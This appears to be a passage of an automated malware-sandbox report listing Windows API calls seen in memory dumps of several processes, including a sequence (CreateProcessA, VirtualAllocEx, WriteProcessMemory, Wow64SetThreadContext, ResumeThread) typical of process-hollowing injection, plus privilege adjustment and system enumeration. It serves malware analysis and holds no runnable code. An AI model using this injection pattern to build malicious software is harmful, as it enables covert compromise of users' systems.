                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,9B09C380,00000000,00000000,00000000,00000000), ref: 01EDB0AE
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01EDAB1A
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 01EDBB2F
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        • String ID:
                                                        • API String ID: 3437242342-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,9B09C380,00000000,00000000,00000000,00000000), ref: 01EDAFBE
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,9B09C380,00000000,00000000,00000000,00000000), ref: 027708E5
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01EDBA7E
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01EDAB1A
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01EDAA71
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,9B09C380,00000000,00000000,00000000,00000000), ref: 02770819
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01EDABC9
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01EDBA7E
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01EDA23E
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 01EDBB2F
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        • String ID:
                                                        • API String ID: 3437242342-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01EDA94A
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01EDABC9
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2109645927.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01EDAA71
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01EDA9C8
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01EDA9C8
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103637068.0000000001EDA000.00000040.00000001.sdmp, Offset: 01EDA000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103629358.0000000001ED2000.00000040.00000001.sdmp, Offset: 01ED2000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2103629358.0000000001ED2000.00000040.00000001.sdmp, Offset: 01ED2000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Executed Functions

                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 002F3BB6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2164991469.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID: I1
                                                        • API String ID: 983334009-834463369
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • KiUserExceptionDispatcher.NTDLL ref: 002F18A8
                                                        • KiUserExceptionDispatcher.NTDLL ref: 002F18BA
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2164991469.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                        Similarity
                                                        • API ID: DispatcherExceptionUser
                                                        • String ID:
                                                        • API String ID: 6842923-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002F4D8E
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2164991469.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 002F4360
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2164991469.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002F4640
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2164991469.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002F4640
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2164991469.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 002F3BB6
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2164991469.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002F407E
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2164991469.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2164991469.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2164991469.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2164835862.000000000011D000.00000040.00000001.sdmp, Offset: 0011D000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2164835862.000000000011D000.00000040.00000001.sdmp, Offset: 0011D000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Executed Functions

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01B9AD37
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01B9AD37
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01B9B329
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01B9B329
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,97F8F4CE,00000000,00000000,00000000,00000000), ref: 01B9AFBE
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,97F8F4CE,00000000,00000000,00000000,00000000), ref: 01B9BDBC
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,97F8F4CE,00000000,00000000,00000000,00000000), ref: 01B9B0AE
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01B9A23E
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,97F8F4CE,00000000,00000000,00000000,00000000), ref: 02770819
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,97F8F4CE,00000000,00000000,00000000,00000000), ref: 027708E5
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01B9A94A
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,97F8F4CE,00000000,00000000,00000000,00000000), ref: 01B9BDBC
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,97F8F4CE,00000000,00000000,00000000,00000000), ref: 01B9B0AE
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01B9AB1A
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2119358544.0000000001B9A000.00000040.00000001.sdmp, Offset: 01B9A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2124067953.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,97F8F4CE,00000000,00000000,00000000,00000000), ref: 01B9AFBE
